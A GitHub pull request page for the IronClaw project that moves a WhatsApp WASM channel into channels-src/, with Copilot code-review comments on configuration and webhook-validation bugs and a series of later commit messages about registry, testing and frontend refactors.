Skip to content

Move whatsapp channel source to channels-src/ for consistency#1

Closed
bowenwang1996 wants to merge 1 commit intomainfrom
fix/consolidate-wasm-channel-sources
Closed

Move whatsapp channel source to channels-src/ for consistency#1
bowenwang1996 wants to merge 1 commit intomainfrom
fix/consolidate-wasm-channel-sources

Conversation

@bowenwang1996
Copy link
Copy Markdown
Contributor

All WASM channel sources are now in channels-src/:

  • slack/
  • telegram/
  • whatsapp/ (moved from channels/)

All WASM channel sources are now in channels-src/:
- slack/
- telegram/
- whatsapp/ (moved from channels/)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copilot wasn't able to review any files in this pull request.


💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The release profile is missing the codegen-units = 1 optimization that is present in both the Slack and Telegram channels. This optimization can improve code generation for size which is important for WASM components. Consider adding it for consistency and better optimization.

Suggested change
lto = true
codegen-units = 1

Copilot uses AI. Check for mistakes.
Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The code logs a warning when the secret is not validated but continues to process the message anyway (line 307). The comment on line 304 mentions "Return 401" but there's no actual return statement. This could allow unauthorized webhook requests to be processed.

Consider adding a return statement here to reject requests with invalid tokens.

Suggested change
// Return 401 but note that host should have already rejected these
return json_response(
401,
serde_json::json!({"error": "Unauthorized"}),
);

Copilot uses AI. Check for mistakes.
Comment on lines 330 to 333
Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The API version is hardcoded to "v18.0" in the URL, but the WhatsAppConfig struct has a configurable api_version field that is parsed from the configuration file (lines 232-234, 257-260). The config value is logged during startup (line 266) but never actually used when making API calls.

Either the api_version from config should be used here, or the api_version field should be removed from the config struct if it's not meant to be configurable.

Suggested change
// Build WhatsApp API URL with placeholders
// Host will replace {WHATSAPP_API_VERSION} in the URL and {WHATSAPP_ACCESS_TOKEN} in the Authorization header
let api_url = format!(
"https://graph.facebook.com/{WHATSAPP_API_VERSION}/{}/messages",

Copilot uses AI. Check for mistakes.
Comment on lines 235 to 248
Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The reply_to_message configuration field (defaulting to true) is defined but never used in the implementation. The WhatsAppMessageMetadata stores the original message_id which could be used to add a context field to the response payload for threading, but this is not implemented.

If reply context is intended to be supported, the on_respond function should conditionally add a context field to the payload based on this config. However, given the stateless nature of WASM components in this architecture, storing and accessing config after on_start may not be feasible. Consider either implementing this feature using the message_id from metadata, or removing the unused config field to avoid confusion.

Suggested change
}
fn default_api_version() -> String {
"v18.0".to_string()
}

Copilot uses AI. Check for mistakes.
Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The validation regex for whatsapp_access_token may be too restrictive. WhatsApp Cloud API access tokens from Meta can contain additional characters beyond [A-Za-z0-9_-], including pipe characters (|) and other special characters. The current regex pattern may reject valid tokens.

Consider using a more permissive pattern or verifying the actual character set used by Meta access tokens.

Suggested change
"validation": "^\\S+$"

Copilot uses AI. Check for mistakes.
Comment on lines 440 to 465
Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The webhook verification function doesn't check the secret_validated field from the request. While the comment on line 448 mentions that "Verify token is validated by host via secret_validated field", there's no actual verification of this field in the code. This could allow verification requests with invalid verify tokens to succeed if they have the correct mode and challenge parameters.

Consider adding a check for req.secret_validated similar to the one in on_http_request (line 299) to ensure the verify token was validated by the host before returning the challenge.

Copilot uses AI. Check for mistakes.
Copy link

Copilot AI Feb 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The Cargo.toml is missing the license field that is present in the other channel implementations (slack and telegram both use "MIT OR Apache-2.0"). This should be added for consistency across the channels and proper licensing information.

Suggested change
description = "WhatsApp Cloud API channel for IronClaw"
license = "MIT OR Apache-2.0"

Copilot uses AI. Check for mistakes.
@ilblackdragon
Copy link
Copy Markdown
Member

Thanks, I moved actually in another PR when was adding on_status change.

@ilblackdragon ilblackdragon deleted the fix/consolidate-wasm-channel-sources branch February 6, 2026 19:17
@serrrfirat serrrfirat mentioned this pull request Feb 10, 2026
ilblackdragon added a commit that referenced this pull request Feb 19, 2026
- Use manifest.name (not crate_name) for installed filenames so
  discovery, auth, and CLI commands all agree on the stem (#1)
- Add AlreadyInstalled error variant instead of misleading
  ExtensionNotFound (#2)
- Add DownloadFailed error variant with URL context instead of
  stuffing URLs into PathBuf (#3)
- Validate HTTP status with error_for_status() before reading
  response bytes in artifact downloads (#4)
- Switch build_wasm_component to tokio::process::Command with
  status() so build output streams to the terminal (#6)
- Find WASM artifact by crate_name specifically instead of picking
  the first .wasm file in the release directory (#7)
- Add is_file() guard in catalog loader to skip directories (#8)
- Detect ambiguous bare-name lookups when both tools/<name> and
  channels/<name> exist, with get_strict() returning an error (#9)
- Fix wizard step_extensions to check tool.name for installed
  detection, consistent with the new naming (#11, #12)
- Fix redundant closures and map_or clippy warnings in changed files

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Feb 20, 2026
- Use manifest.name (not crate_name) for installed filenames so
  discovery, auth, and CLI commands all agree on the stem (#1)
- Add AlreadyInstalled error variant instead of misleading
  ExtensionNotFound (#2)
- Add DownloadFailed error variant with URL context instead of
  stuffing URLs into PathBuf (#3)
- Validate HTTP status with error_for_status() before reading
  response bytes in artifact downloads (#4)
- Switch build_wasm_component to tokio::process::Command with
  status() so build output streams to the terminal (#6)
- Find WASM artifact by crate_name specifically instead of picking
  the first .wasm file in the release directory (#7)
- Add is_file() guard in catalog loader to skip directories (#8)
- Detect ambiguous bare-name lookups when both tools/<name> and
  channels/<name> exist, with get_strict() returning an error (#9)
- Fix wizard step_extensions to check tool.name for installed
  detection, consistent with the new naming (#11, #12)
- Fix redundant closures and map_or clippy warnings in changed files

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Feb 20, 2026
…tion (#238)

* feat: add extension registry with metadata catalog, CLI, and onboarding integration

Adds a central registry that catalogs all 14 available extensions (10 tools,
4 channels) with their capabilities, auth requirements, and artifact references.
The onboarding wizard now shows installable channels from the registry and
offers tool installation as a new Step 7.

- registry/ folder with per-extension JSON manifests and bundle definitions
- src/registry/ module: manifest structs, catalog loader, installer
- `ironclaw registry list|info|install|install-defaults` CLI commands
- Setup wizard enhanced: channels from registry, new extensions step (8 steps)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(setup): resolve workspace errors for tool crates and channels-only onboarding

Tool crates in tools-src/ and channels-src/ failed `cargo metadata` during
onboard install because Cargo resolved them as part of the root workspace.
Add `[workspace]` table to each standalone crate and extend the root
`workspace.exclude` list so they build independently.

Channels-only mode (`onboard --channels-only`) failed with "Secrets not
configured" and "No database connection" because it skipped database and
security setup. Add `reconnect_existing_db()` to establish the DB connection
and load saved settings before running channel configuration.

Also improve the tunnel "already configured" display to show full provider
details (domain, mode, command) instead of just the provider name.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(registry): address PR review feedback on installer and catalog

- Use manifest.name (not crate_name) for installed filenames so
  discovery, auth, and CLI commands all agree on the stem (#1)
- Add AlreadyInstalled error variant instead of misleading
  ExtensionNotFound (#2)
- Add DownloadFailed error variant with URL context instead of
  stuffing URLs into PathBuf (#3)
- Validate HTTP status with error_for_status() before reading
  response bytes in artifact downloads (#4)
- Switch build_wasm_component to tokio::process::Command with
  status() so build output streams to the terminal (#6)
- Find WASM artifact by crate_name specifically instead of picking
  the first .wasm file in the release directory (#7)
- Add is_file() guard in catalog loader to skip directories (#8)
- Detect ambiguous bare-name lookups when both tools/<name> and
  channels/<name> exist, with get_strict() returning an error (#9)
- Fix wizard step_extensions to check tool.name for installed
  detection, consistent with the new naming (#11, #12)
- Fix redundant closures and map_or clippy warnings in changed files

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(setup): restore DB connection fields after settings reload

reconnect_postgres() and reconnect_libsql() called Settings::from_db_map()
which overwrote database_url / libsql_path / libsql_url set from env vars.
Also use get_strict() in cmd_info to surface ambiguous bare-name errors.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* style: fix clippy collapsible_if and print_literal warnings

Collapse nested if-let chains and inline string literals in format
macros to satisfy CI clippy lint checks (deny warnings).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(registry): prefer artifacts for install-defaults and improve dir lookup

- InstallDefaults now defaults to downloading pre-built artifacts
  (matching `registry install` behavior), with --build flag for source builds.
- find_registry_dir() walks up 3 ancestor levels from the exe and adds
  a CARGO_MANIFEST_DIR fallback, matching load_registry_catalog() logic.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
jaswinder6991 pushed a commit to jaswinder6991/ironclaw that referenced this pull request Feb 26, 2026
…tion (nearai#238)

* feat: add extension registry with metadata catalog, CLI, and onboarding integration

Adds a central registry that catalogs all 14 available extensions (10 tools,
4 channels) with their capabilities, auth requirements, and artifact references.
The onboarding wizard now shows installable channels from the registry and
offers tool installation as a new Step 7.

- registry/ folder with per-extension JSON manifests and bundle definitions
- src/registry/ module: manifest structs, catalog loader, installer
- `ironclaw registry list|info|install|install-defaults` CLI commands
- Setup wizard enhanced: channels from registry, new extensions step (8 steps)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(setup): resolve workspace errors for tool crates and channels-only onboarding

Tool crates in tools-src/ and channels-src/ failed `cargo metadata` during
onboard install because Cargo resolved them as part of the root workspace.
Add `[workspace]` table to each standalone crate and extend the root
`workspace.exclude` list so they build independently.

Channels-only mode (`onboard --channels-only`) failed with "Secrets not
configured" and "No database connection" because it skipped database and
security setup. Add `reconnect_existing_db()` to establish the DB connection
and load saved settings before running channel configuration.

Also improve the tunnel "already configured" display to show full provider
details (domain, mode, command) instead of just the provider name.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(registry): address PR review feedback on installer and catalog

- Use manifest.name (not crate_name) for installed filenames so
  discovery, auth, and CLI commands all agree on the stem (nearai#1)
- Add AlreadyInstalled error variant instead of misleading
  ExtensionNotFound (nearai#2)
- Add DownloadFailed error variant with URL context instead of
  stuffing URLs into PathBuf (nearai#3)
- Validate HTTP status with error_for_status() before reading
  response bytes in artifact downloads (nearai#4)
- Switch build_wasm_component to tokio::process::Command with
  status() so build output streams to the terminal (nearai#6)
- Find WASM artifact by crate_name specifically instead of picking
  the first .wasm file in the release directory (nearai#7)
- Add is_file() guard in catalog loader to skip directories (nearai#8)
- Detect ambiguous bare-name lookups when both tools/<name> and
  channels/<name> exist, with get_strict() returning an error (nearai#9)
- Fix wizard step_extensions to check tool.name for installed
  detection, consistent with the new naming (nearai#11, nearai#12)
- Fix redundant closures and map_or clippy warnings in changed files

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(setup): restore DB connection fields after settings reload

reconnect_postgres() and reconnect_libsql() called Settings::from_db_map()
which overwrote database_url / libsql_path / libsql_url set from env vars.
Also use get_strict() in cmd_info to surface ambiguous bare-name errors.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* style: fix clippy collapsible_if and print_literal warnings

Collapse nested if-let chains and inline string literals in format
macros to satisfy CI clippy lint checks (deny warnings).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(registry): prefer artifacts for install-defaults and improve dir lookup

- InstallDefaults now defaults to downloading pre-built artifacts
  (matching `registry install` behavior), with --build flag for source builds.
- find_registry_dir() walks up 3 ancestor levels from the exe and adds
  a CARGO_MANIFEST_DIR fallback, matching load_registry_catalog() logic.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Mar 5, 2026
- Increase wait_for_responses polling to exponential backoff (50ms-500ms)
  and raise default timeout from 15s to 30s to reduce CI flakiness (#1)
- Strengthen prompt_injection_resilience test with positive safety layer
  assertion via has_safety_warnings(), enable injection_check (#2)
- Add assert_tool_order() helper and tools_order field in TraceExpects
  for verifying tool execution ordering in multi-step traces (#3)
- Document TraceLlm sequential-call assumption for concurrency (#6)
- Clean up CleanupGuard with PathKind enum instead of shotgun
  remove_file + remove_dir_all on every path (#8)
- Fix coverage.sh: default to --lib only, fix multi-filter syntax,
  add COV_ALL_TARGETS option
- Add coverage/ to .gitignore
- Remove planning docs from PR

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Mar 5, 2026
* refactor: extract shared assertion helpers to support/assertions.rs

Move 5 assertion helpers from e2e_spot_checks.rs to a shared module.
Add assert_all_tools_succeeded and assert_tool_succeeded for eliminating
false positives in E2E tests.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add tool output capture via tool_results() accessor

Extract (name, preview) from ToolResult status events in TestChannel
and TestRig, enabling content assertions on tool outputs.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: correct tool parameters in 3 broken trace fixtures

- tool_time.json: add missing "operation": "now" for time tool
- robust_correct_tool.json: same fix
- memory_full_cycle.json: change "path" to "target" for memory_write

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add tool success and output assertions to eliminate false positives

Every E2E test that exercises tools now calls assert_all_tools_succeeded.
Added tool output content assertions where tool results are predictable
(time year, read_file content, memory_read content).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: capture per-tool timing from ToolStarted/ToolCompleted events

Record Instant on ToolStarted and compute elapsed duration on
ToolCompleted, wiring real timing data into collect_metrics() instead
of hardcoded zeros.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* refactor: add RAII CleanupGuard for temp file/dir cleanup in tests

Replace manual cleanup_test_dir() calls and inline remove_file() with
Drop-based CleanupGuard that ensures cleanup even if a test panics.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add Drop impl and graceful shutdown for TestRig

Wrap agent_handle in Option so Drop can abort leaked tasks. Signal
the channel shutdown before aborting for future cooperative shutdown.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: replace agent startup sleep with oneshot ready signal

Use a oneshot channel fired in Channel::start() instead of a fixed
100ms sleep, eliminating the race condition on slow systems.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: replace fragile string-matching iteration limit with count-based detection

Use tool completion count vs max_tool_iterations instead of scanning
status messages for "iteration"/"limit" substrings.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use assert_all_tools_succeeded for memory_full_cycle test

Remove incorrect comment about memory_tree failing with empty path
(it actually succeeds). Omit empty path from fixture and use the
standard assert_all_tools_succeeded instead of per-tool assertions.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* refactor: promote benchmark metrics types to library code

Move TraceMetrics, ScenarioResult, RunResult, MetricDelta, and
compare_runs() from tests/support/metrics.rs to src/benchmark/metrics.rs.
Existing tests use re-export for backward compatibility.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add Scenario and Criterion types for agent benchmarking

Scenario defines a task with input, success criteria, and resource
limits. Criterion is an enum of programmatic checks (tool_used,
response_contains, etc.) evaluated without LLM judgment.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add initial benchmark scenario suite (12 scenarios across 5 categories)

Scenarios cover tool_selection, tool_chaining, error_recovery,
efficiency, and memory_operations. All loaded from JSON with
deserialization validation test.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add benchmark runner with BenchChannel and InstrumentedLlm

BenchChannel is a minimal Channel implementation for benchmarks.
InstrumentedLlm wraps any LlmProvider to capture per-call metrics.
Runner creates a fresh agent per scenario, evaluates success criteria,
and produces RunResult with timing, token, and cost metrics.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add baseline management, reports, and benchmark entry point

- baseline.rs: load/save/promote benchmark results
- report.rs: format comparison reports with regression detection
- benchmark_runner.rs: integration test with real LLM (feature-gated)
- Add benchmark feature flag to Cargo.toml

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* style: apply cargo fmt to benchmark module

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add multi-turn scenario types with setup, judge, ResponseNotContains

Add BenchScenario, Turn, TurnAssertions, JudgeConfig, ScenarioSetup,
WorkspaceSetup, SeedDocument types for multi-turn benchmark scenarios.
Add ResponseNotContains criterion variant. Add TurnAssertions::to_criteria()
converter for backward compat with existing evaluation engine.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add JSON scenario loader with recursive discovery and tag filter

Add load_bench_scenarios() for the new BenchScenario format with recursive
directory traversal and tag-based filtering. Create 4 initial trajectory
scenarios across tool-selection, multi-turn, and efficiency categories.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): multi-turn runner with workspace seeding and per-turn metrics

Add run_bench_scenario() that loops over BenchScenario turns, seeds workspace
documents, collects per-turn metrics (tokens, tool calls, wall time), and
evaluates per-turn assertions. Add TurnMetrics to metrics.rs and
clear_for_next_turn() to BenchChannel.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add LLM-as-judge scoring with prompt formatting and score parsing

Create judge.rs with format_judge_prompt, parse_judge_score, and judge_turn.
Wire into run_bench_scenario for turns with judge config -- scores below
min_score fail the turn.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add CLI subcommand (ironclaw benchmark)

Add BenchmarkCommand with --tags, --scenario, --no-judge, --timeout,
--update-baseline flags. Wire into Command enum and main.rs dispatch.
Feature-gated behind benchmark flag.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): per-scenario JSON output with full trajectory

Add save_scenario_results() that writes per-scenario JSON files alongside
the run summary. Each scenario gets its own file with turn_metrics trajectory.
Update CLI to use new output format.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add ToolRegistry::retain_only and wire tool filtering in scenarios

Add a retain_only() method to ToolRegistry that filters tools down to a
given allowlist. Wire this into run_bench_scenario() so that when a
scenario specifies a tools list in its setup, only those tools are
available during the benchmark run. Includes two tests for the new
method: one verifying filtering works and one verifying empty input
is a no-op.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): wire identity overrides into workspace before agent start

Add seed_identity() helper that writes identity files (IDENTITY.md,
USER.md, etc.) into the workspace before the agent starts, so that
workspace.system_prompt() picks them up. Wire it into
run_bench_scenario() after workspace seeding. Include a test that
verifies identity files are written and readable.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add --parallel and --max-cost CLI flags

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(benchmark): use feature-conditional snapshot names for CLI help tests

Prevents snapshot conflicts between default (no benchmark) and
all-features (with benchmark) builds by using separate snapshot names
per feature set.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): parallel execution with JoinSet and budget cap enforcement

Replace sequential loop in run_all_bench() with parallel execution using
JoinSet + semaphore when config.parallel > 1. Add budget cap enforcement
that skips remaining scenarios when max_total_cost_usd is exceeded.
Track skipped count in RunResult.skipped_scenarios and display it in
format_report().

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add tool restriction and identity override test scenarios

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* chore: fix formatting for Phase 3

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add SkillRegistry::retain_only and wire skill filtering in scenarios

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(benchmark): add --json flag for machine-readable output

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* ci: add GitHub Actions benchmark workflow (manual trigger)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* refactor(benchmark): remove in-tree benchmark harness, keep retain_only utilities

Move benchmark-specific code out of ironclaw in preparation for the
nearai/benchmarks trajectory adapter. This removes:

- src/benchmark/ (runner, scenarios, metrics, judge, report, etc.)
- src/cli/benchmark.rs and the Benchmark CLI subcommand
- benchmarks/ data directory (scenarios + trajectories)
- .github/workflows/benchmark.yml
- The "benchmark" Cargo feature flag

What remains:
- ToolRegistry::retain_only() and SkillRegistry::retain_only()
- Test support types (TraceMetrics, InstrumentedLlm) inlined into
  tests/support/ instead of re-exporting from the deleted module

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* docs: add README for LLM trace fixture format

Documents the trajectory JSON format, response types, request hints,
directory structure, and how to write new traces.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat(test): unify trace format around turns, add multi-turn support

Introduce TraceTurn type that groups user_input with LLM response steps,
making traces self-contained conversation trajectories. Add run_trace()
to TestRig for automatic multi-turn replay. Backward-compatible: flat
"steps" JSON is deserialized as a single turn transparently.

Includes all trace fixtures (spot, coverage, advanced), plan docs, and
new e2e tests for steering, error recovery, long chains, memory, and
prompt injection resilience.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(test): fix CI failures after merging main

- Fix tool_json fixture: use "data" parameter (not "input") to match
  JsonTool schema
- Fix status_events test: remove assertion for "time" tool that isn't
  in the fixture (only "echo" calls are used)
- Allow dead_code in test support metrics/instrumented_llm modules
  (utilities for future benchmark tests)

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* Working on recording traces and testing them

* feat(test): add declarative expects to trace fixtures, split infra tests

Add TraceExpects struct with 9 optional assertion fields (response_contains,
tools_used, all_tools_succeeded, etc.) that can be declared in fixture JSON
instead of hand-written Rust. Add verify_expects() and run_recorded_trace()
so recorded trace tests become one-liners.

Split trace infra tests (deserialization, backward compat) into
tests/trace_format.rs which doesn't require the libsql feature gate.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* refactor(test): add expects to all trace fixtures, simplify e2e tests

Add declarative expects blocks to all 19 trace fixture JSONs across
spot/, coverage/, advanced/, and root directories. Update all 8 e2e
test files to use verify_trace_expects() / run_and_verify_trace(),
replacing ~270 lines of hand-written assertions with fixture-driven
verification.

Tests that check things beyond expects (file content on disk, metrics,
event ordering) keep those extra assertions alongside the declarative
ones.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(test): adapt tests to AppBuilder refactor, fix formatting

Update test files to work with refactored TestRigBuilder that uses
AppBuilder::build_all() (removing with_tools/with_workspace methods).
Update telegram_check fixture to use tool_list instead of echo.
Fix cargo fmt issues in src/llm/mod.rs and src/llm/recording.rs.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* refactor(test): deduplicate support unit tests into single binary

Support modules (assertions, cleanup, test_channel, test_rig, trace_llm)
had #[cfg(test)] mod tests blocks that were compiled and run 12 times —
once per e2e test binary that declares `mod support;`. Extracted all 29
support unit tests into a dedicated `tests/support_unit_tests.rs` so they
run exactly once.

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* style: fix trailing newlines in support files

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* refactor(test): unify trace types and fix recorded multi-turn replay

Import shared types (TraceStep, TraceResponse, TraceToolCall, RequestHint,
ExpectedToolResult, MemorySnapshotEntry, HttpExchange*) from
ironclaw::llm::recording instead of redefining them in trace_llm.rs.

Fix the flat-steps deserializer to split at UserInput boundaries into
multiple turns, instead of filtering them out and wrapping everything
into a single turn. This enables recorded multi-turn traces to be
replayed as proper multi-turn conversations via run_trace().

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(test): fix CI failures - unused imports and missing struct fields

- Add #[allow(unused_imports)] on pub use re-exports in trace_llm.rs
  (types are re-exported for downstream test files, not used locally)
- Add `..` to ToolCompleted pattern in test_channel.rs to match new
  `error` and `parameters` fields

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(test): fix CI failures after merging main

- Add missing `error` and `parameters` fields to ToolCompleted
  constructors in support_unit_tests.rs
- Add `..` to ToolCompleted pattern match in support_unit_tests.rs
- Add #[allow(dead_code)] to CleanupGuard, LlmTrace impl, and
  TraceLlm impl (only used behind #[cfg(feature = "libsql")])

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* Adding coverage running script

* fix(test): address review feedback on E2E test infrastructure

- Increase wait_for_responses polling to exponential backoff (50ms-500ms)
  and raise default timeout from 15s to 30s to reduce CI flakiness (#1)
- Strengthen prompt_injection_resilience test with positive safety layer
  assertion via has_safety_warnings(), enable injection_check (#2)
- Add assert_tool_order() helper and tools_order field in TraceExpects
  for verifying tool execution ordering in multi-step traces (#3)
- Document TraceLlm sequential-call assumption for concurrency (#6)
- Clean up CleanupGuard with PathKind enum instead of shotgun
  remove_file + remove_dir_all on every path (#8)
- Fix coverage.sh: default to --lib only, fix multi-filter syntax,
  add COV_ALL_TARGETS option
- Add coverage/ to .gitignore
- Remove planning docs from PR

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address PR review - use HashSet in retain_only, improve skill test

- Use HashSet for O(N+M) lookup in SkillRegistry::retain_only and
  ToolRegistry::retain_only instead of linear scan
- Strengthen test_retain_only_empty_is_noop in SkillRegistry to
  pre-populate with a skill before asserting the no-op behavior

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix(test): revert incorrect safety layer assertion in injection test

The safety layer sanitizes tool output, not user input. The injection
test sends a malicious user message with no tools called, so the safety
layer never fires. Reverted to the original test which correctly
validates the LLM refuses via trace expects. Also fixed case-sensitive
request hint ("ignore" -> "Ignore") to suppress noisy warning.

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: clean stale profdata before coverage run

Adds `cargo llvm-cov clean` before each run to prevent
"mismatched data" warnings from stale instrumentation profiles.

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* style: fix formatting in retain_only test

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: Illia Polosukhin <ilblackdragon@gmail.com>
ilblackdragon added a commit that referenced this pull request Mar 6, 2026
- Switch build script from python3 to jq for JSON parsing, consistent
  with release.yml and avoids python3 dependency (#1, #7)
- Use dirs::home_dir() instead of HOME env var for portability (#2)
- Filter extensions by manifest "kind" field instead of path (#3)
- Replace .flatten() with explicit error handling in dir iteration (#4, #5)
- Split stub_tool_host_functions into stub_shared_host_functions +
  tool-only tool-invoke stub, since tool-invoke is not in channel WIT (#6)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Mar 6, 2026
* test: add WIT compatibility tests for all WASM tools and channels

Adds CI and integration tests to catch WIT interface breakage across
all 14 WASM extensions (10 tools + 4 channels). Previously, changing
wit/tool.wit or wit/channel.wit could silently break guest-side tools
that weren't rebuilt until release time.

Three new pieces:

1. scripts/build-wasm-extensions.sh — builds all WASM extensions from
   source by reading registry manifests. Used by CI and locally.

2. tests/wit_compat.rs — integration tests that compile and instantiate
   each .wasm binary against the current wasmtime host linker with
   stubbed host functions. Catches added/removed/renamed WIT functions,
   signature mismatches, and missing exports. Skips gracefully when
   artifacts aren't built so `cargo test` still passes standalone.

3. .github/workflows/test.yml — new wasm-wit-compat CI job that builds
   all extensions then runs instantiation tests on every PR. Added to
   the branch protection roll-up.

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* style: fix rustfmt formatting in wit_compat tests

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address PR review feedback on WIT compat tests

- Switch build script from python3 to jq for JSON parsing, consistent
  with release.yml and avoids python3 dependency (#1, #7)
- Use dirs::home_dir() instead of HOME env var for portability (#2)
- Filter extensions by manifest "kind" field instead of path (#3)
- Replace .flatten() with explicit error handling in dir iteration (#4, #5)
- Split stub_tool_host_functions into stub_shared_host_functions +
  tool-only tool-invoke stub, since tool-invoke is not in channel WIT (#6)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Apr 10, 2026
…ith widget system (#1725)

* feat(frontend): extract frontend into ironclaw_frontend crate with widget extension system

Moves all frontend static assets (app.js, style.css, index.html, i18n/*,
theme-init.js, favicon.ico) from src/channels/web/static/ into a dedicated
ironclaw_frontend crate. The crate also adds:

- Layout configuration types (branding, tab order, chat features, per-widget config)
- Widget manifest types with named slot system (tab, chat_header, sidebar, etc.)
- CSS scoping utility (auto-prefixes selectors with [data-widget="id"])
- Bundle assembly (injects layout config, widgets, and custom CSS into HTML)
- Frontend API endpoints (GET/PUT layout, list widgets, serve widget files)
- Browser-side IronClaw.registerWidget() API with authenticated fetch,
  event subscription, theme access, and i18n

